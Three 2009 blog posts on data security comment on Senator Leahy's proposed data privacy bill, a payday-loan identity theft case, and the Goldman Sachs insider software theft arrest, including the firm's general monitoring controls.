Wednesday, July 29, 2009

Is Senator Leahy a Capitalist?

On July 22, 2009 Senator Patrick Leahy (D-VT) introduced the "Personal Data Privacy and Security Act" to combat the growing number of data breaches. As of July 24, 2009 the Privacy Rights Clearing House had calculated 263,214,232 records had been "lost." They are posting new breaches every week; and these are just those that are public knowledge.

We applaud Senator Leahy for tackling this important issue as it threatens the trust in the financial systems that we use and have become central to the American way of life.

However, several things strike me about the proposed legislation that protect the data brokers and not individuals. First in Section 303 dealing with the "Privacy and Security of Personally Identifiable Information" there is a prohibition against "private action." That protects the data brokers from being sued by the people that have been adversely affected by a data breach. If someone is defrauded out of tens of thousands of dollars because a company lost their records, there is no recourse to sue and try to recover damages and associated costs in dealing with the identify theft. How does that protect the consumer?

Second, Section 316 gives a breached organization 14 days to report the breach to law enforcement agencies (the Secret Service in this case). That is way too long. In 14 days hundreds of thousands of those records could be resold by hackers and be used in fraudulent transactions. Why not make the notification requirement 24 hours? Better safe than sorry.

More to follow on this legislation as it is a step in the right direction.

Monday, July 13, 2009

Identify Theft Comes to Payday Loans

According to the Chicago Tribune a temporary worker from AT&T, Cassandra Walls, stole information on a number of her co-workers and took out at least 130 loans in their names. Some of the victims found out they had been scammed when collection agencies began calling them.

Let's hope that this identify thief and her co-conspirators are able to compensate all of their victims, even if they have to wait until they get out of prison.

Friday, July 10, 2009

Goldman Sachs Data Breach

Earlier this week the FBI arrested Sergey Aleynikov for the theft of proprietary software from his employer, Goldman Sachs. The complaint is fascinating in providing insight as to what a leading financial institution is doing to protect its intellectual property. Here are some of the items that they had in place (we know there are more controls that were not revealed in the document):
  • Scanned and analyzed outgoing mail
  • Prohibited file transfers using ftp to outside locations
  • Recorded commands performed on the user's desktop
  • Logged access to systems
  • Monitored https traffic

Sergey was a sophisticated insider with technical skills who tried to cover his tracks, unfortunately for him, the security folks at Goldman Sachs were several steps ahead of him.

One other lesson that we should learn from the affidavit is that:

1) They had a written security policy.
2) That put tools in place to support that policy.
3) They had a security architecture in place to detect when the policy was being violated.

Kudos to the security team at Goldman and the FBI agents who arrested Aleynikov.